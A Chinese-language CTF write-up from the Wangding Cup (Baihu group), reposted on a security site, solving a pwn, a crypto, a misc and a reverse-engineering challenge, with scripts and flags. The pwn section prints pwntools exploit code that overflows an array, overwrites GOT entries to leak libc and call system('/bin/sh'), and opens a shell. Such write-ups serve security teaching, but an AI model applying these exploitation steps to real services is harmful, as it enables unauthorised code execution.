“网鼎杯”白虎组-船山院士wp

admin
admin
admin
138635
文章
114
评论
2023年3月4日02:21:12评论184 views字数 5016阅读16分43秒阅读模式

感谢Yeuoly、丶Sweet、耳东田心走刀口战队成员提供思路,种种原因,这次只我报了名,看成绩最后应该是可以进入线下,诸多原因,放弃了,没有提交WP,今天公众号发布出来,请各位师傅批评指正!


“网鼎杯”白虎组-船山院士wp



Pwn982

就。。官方给的这个libc也太迷惑了一点,这里崩那里崩,patchelf换掉以后还会崩掉bss的环境,没办法最后直接换的虚拟机的libc

首先很明显的在show的地方存在栈溢出,同时没有限制负数

“网鼎杯”白虎组-船山院士wp

length_array可控且可以是负数

“网鼎杯”白虎组-船山院士wp

自定义read中存在大量0字符截断,所以常规方法打不太通

“网鼎杯”白虎组-船山院士wp

考虑到add处存在溢出

“网鼎杯”白虎组-船山院士wp

heaparray长度为0x400,即1024,但是length可以为10,即修改 1000 ~ 1100的内容,可以覆盖到count,将其改为负数

题目开了PIE,有canary

考虑首先在show中泄露proc_base

“网鼎杯”白虎组-船山院士wp

“网鼎杯”白虎组-船山院士wp

“网鼎杯”白虎组-船山院士wp

然后泄露libc,溢出到got修改memset的got为puts,因为栈的UAF的问题,会在memset处留下一出libc地址,改为puts进行泄露

sleep(0.1)sl(b'1')sla(b'Please enter your data:', b'a' * 8 * 8 + b'xfexffxffxff')sla(b'Please enter the length of your data:', b'101')
printf_got = proc_base + elf.got['printf']puts_plt = proc_base + elf.plt['puts']
sleep(0.1)sl(b'1')sla(b'Please enter your data:', b'a' * 4 + p64(puts_plt))sla(b'Please enter the length of your data:', b'101')
sl(b'1')sla(b'Please enter your data:', b'a' * 4 + p64(puts_plt))sla(b'Please enter the length of your data:', b'101')
sl(b'2')

接收libc基址

libc_base = u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00')) - libc.sym['_IO_2_1_stdout_']sla(b'number of your data:', b'-1')

然后再次溢出修改memset的got为system,主要是这里one_gadget用不了

for i in range(9):    sleep(0.1)    sl(b'1')    sla(b'Please enter your data:', b'x10' * 30)    sla(b'Please enter the length of your data:', b'101')
sl(b'1')sla(b'Please enter your data:', b'a' * 8 * 8 + b'xfexffxffxff')sla(b'Please enter the length of your data:', b'101')system = libc_base + libc.sym['system']
sleep(0.1)sl(b'1')sla(b'Please enter your data:', b'a' * 4 + p64(system))sla(b'Please enter the length of your data:', b'101')

再次利用栈的UAF,第一次将bin/sh写入栈,但是无法执行,第二次再进入show即可触发system(/bin/sh)

sl(b'1')sla(b'Please enter your data:', b'/bin/shx00')sla(b'Please enter the length of your data:', b'101')
sl(b'2')sl(b'1')sl(b'2')
#gdb.attach(p, 'b *$rebase(0x14d9)')p.interactive()

“网鼎杯”白虎组-船山院士wp


Crypto582

脚本:

from Crypto.Util.number import getPrimeimport hashlib,math
e = 2022
c1 = 85139434329272123519094184286276070319638471046264384499440682030525456122476228324462769126167628121006213531153927884870307999106015430909361792093581895091445829379547633304737916675926004298753674268141399550405934376072486086468186907326396270307581239055199288888816051281495009808259009684332333344687c2 = 104554808380721645840032269336579549039995977113982697194651690041676187039363703190743891658905715473980017457465221488358016284891528960913854895940235089108270134689312161783470000803482494370322574472422461483052403826282470850666418693908817591349159407595131136843764544166774390400827241213500917391144c3 = 94771625845449128812081345291218973301979152577131568497740476123729158619324753128517222692750900524689049078606978317742545997482763600884362992468406577524708622046033409713416026145377740182233674890063333534646927601262333672233695863286637817471270314093720827409474178917969326556939942622112511819330x = 78237329408351955465927092805995076909826011029371783256454322166600398149132623484679723362562600068961760410039241554232588011577854168402399895992331761353772415982560522912511879304977362225597552446397868843275129027248765252784503841114291392822052506837132093960290237335686354012448414804030938873765y = 100442166633632319633494450595418167608036668647704883492068692098914206322465717138894302011092841820156560129280901426898815274744523998613724326647935591857728931946261379997352809249780159136988674034759483947949779535134522005905257436546335376141008113285692888482442131971935583298243412131571769294029z = 104712661985900115750011628727270934552698948001634201257337487373976943443738367683435788889160488319624447315127992641805597631347763038111352925925686965948545739394656951753648392926627442105629724634607023721715249914976189181389720790879720452348480924301370569461741945968322303130995996793764440204452
a = (x-2022)**e-c1b = (y-2022)**e-c2c=math.gcd(a,b)d = (x-e)%ce = (y-e)%c+cflag = c+d+eflag =hashlib.md5(str(flag).encode('utf-8')).hexdigest()
print("flag{"+(flag)+"}")

flag{27979a70ef9152b759d9340779256dc8}


Misc620

1.        暴力破解zip文件,8位数字,结果为99114514

“网鼎杯”白虎组-船山院士wp

2.        解压后得到一个csv文件和一个7z文件。csv文件password字段解密得到7z文件密码为nmy0612

“网鼎杯”白虎组-船山院士wp

“网鼎杯”白虎组-船山院士wp

3.        解压7z文件得到flag.txt里韩文:

웬후ퟳ듳삨뫅뗘뛾튻튻뛾뻅뛾죽룜웟냋뗘쇹룜쯄쇣쇹쯄룜뻅웟웟쾸룜뇘웟죽뛾뻅웟뗘쾸쯄쯄뻅튻폒듳삨뫅

“网鼎杯”白虎组-船山院士wp

4.        使用CyberCheftext encoding brute force暴力解码得到中文flag,转换为英文flag提交即可。

“网鼎杯”白虎组-船山院士wp

旗帜左大括号地二一一二九二三杠七八地六杠四零六四杠九七七细杠必七三二九七地细四四九一右大括号

flag{d2112923-78d6-4064-977c-b73297dc4491}


Re790

魔改Tea,把delta换了,直接z3就能出来

手动去了花

“网鼎杯”白虎组-船山院士wp

“网鼎杯”白虎组-船山院士wp

#include <stdint.h>#include <stdio.h>
uint32_t shift(uint32_t val, int n) {    return (val << (8 - n) | (val >> n));}
unsigned char encrypted[] = {    0xf2, 0x7f, 0x09, 0x05, 0xd7, 0x77, 0x16, 0x91, 0x25, 0x01, 0x2e,    0xc5, 0x97, 0x26, 0x63, 0x82, 0x01, 0x40, 0x15, 0x2d, 0xfc, 0x53,    0xdb, 0xd3, 0xc4, 0xdb, 0x0a, 0x1f, 0x82, 0x1e, 0x99, 0x4e, 0xfe,    0x0c, 0x80, 0xb8, 0xa5, 0x61, 0x0e, 0x99, 0xdf, 0x39};
void re(unsigned char *encrypted) {    unsigned int v1, v2, sum;    int times = 32;
    for (int i = 0; i < 5; i++) {        v1 = *(uint32_t *)(encrypted + 8 * i);        v2 = *(uint32_t *)(encrypted + 8 * i + 4);        sum = 0x6526b0d9;        times = 32;
        do {            sum += 0x61c88647;            v2 -= ((v1 << 4) + 0x43) ^ (sum + v1) ^ ((v1 >> 5) + 0x56);            v1 -= ((v2 << 4) + 0xc) ^ (sum + v2) ^ ((v2 >> 5) + 0x2d);            --times;        } while(times);        *(uint32_t *)(encrypted + 8 * i) = v1;        *(uint32_t *)(encrypted + 8 * i + 4) = v2;    }}
int main() {    for(int i = 0; i < 42; i++) {        encrypted[i] = shift(encrypted[i], 5);    }
    for(int i = 0; i < 42; i++) {        encrypted[i] ^= 0x66;        encrypted[i] -= 0x32;    }
    re(encrypted);    printf("%s", encrypted);}

“网鼎杯”白虎组-船山院士wp

原文始发于微信公众号(衡阳信安):“网鼎杯”白虎组-船山院士wp

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月4日02:21:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   “网鼎杯”白虎组-船山院士wphttps://cn-sec.com/archives/1262751.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息